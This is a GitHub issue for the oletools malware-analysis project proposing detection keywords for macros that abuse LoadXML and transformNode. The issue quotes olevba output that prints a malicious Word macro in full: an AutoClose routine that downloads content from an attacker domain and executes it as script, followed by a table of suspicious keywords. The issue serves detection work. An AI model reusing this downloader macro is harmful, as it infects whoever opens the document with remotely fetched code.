search

decalage2 / oletools

oletools - python tools to analyze MS OLE2 files (Structured Storage, Compound File Binary Format) and MS Office documents, for malware analysis, forensics and debugging.
http://www.decalage.info/python/oletools
Other
2.93k stars 563 forks source link

olevba, mraptor: add keywords LoadXML/transformNode for XSL to script #851

Open decalage2 opened 8 months ago

decalage2 commented 8 months ago

Several recent samples use LoadXML and transformNode methods (on a MSXML2.DomDocument COM object) to apply an XSL stylesheet to XML data and obtain a malicious JavaScript which seems to be executed automatically:

transformNode: https://learn.microsoft.com/en-us/previous-versions/windows/desktop/ms761399(v=vs.85)

more info:

$ olevba bbdbcec62526b94b38d7ab4e0e794efcc363cd7ec033f39c543c666378c317ea.doc 
olevba 0.60.1 on Python 3.11.6 - http://decalage.info/python/oletools
===============================================================================
FILE: bbdbcec62526b94b38d7ab4e0e794efcc363cd7ec033f39c543c666378c317ea.doc
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls 
in file: bbdbcec62526b94b38d7ab4e0e794efcc363cd7ec033f39c543c666378c317ea.doc - OLE stream: 'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Module1.bas 
in file: bbdbcec62526b94b38d7ab4e0e794efcc363cd7ec033f39c543c666378c317ea.doc - OLE stream: 'Macros/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
Sub AUtoclose()
Set Document = CreateObject("MSXML2.DomDocument")
Set dOcuMeNtXMl = CreateObject("MSXML2.xmlhttp")
Document.async = 0
With dOcuMeNtXMl
.Open "get", "https://adfhjiuyqnmahdfiuad.com/index.php", False
.senD
End With
Document.LoadXML dOcuMeNtXMl.responseText
Document.tRAnsformnode Document
End Sub
+----------+--------------------+---------------------------------------------+
|Type      |Keyword             |Description                                  |
+----------+--------------------+---------------------------------------------+
|AutoExec  |AUtoclose           |Runs when the Word document is closed        |
|Suspicious|Open                |May open a file                              |
|Suspicious|CreateObject        |May create an OLE object                     |
|Suspicious|MSXML2.xmlhttp      |May download files from the Internet         |
|IOC       |https://adfhjiuyqnma|URL                                          |
|          |hdfiuad.com/index.ph|                                             |
|          |p                   |                                             |
+----------+--------------------+---------------------------------------------+
decalage2 commented 1 month ago

Also another sample using transformNodeToObject: https://x.com/vmray/status/1844362742595018809

https://www.vmray.com/analyses/_vt/205a543c733e/report/overview.html

https://labs.inquest.net/dfi/sha256/205a543c733eea51309dea6fa850f87bcaeefa1835bd0955ea43923820e2834e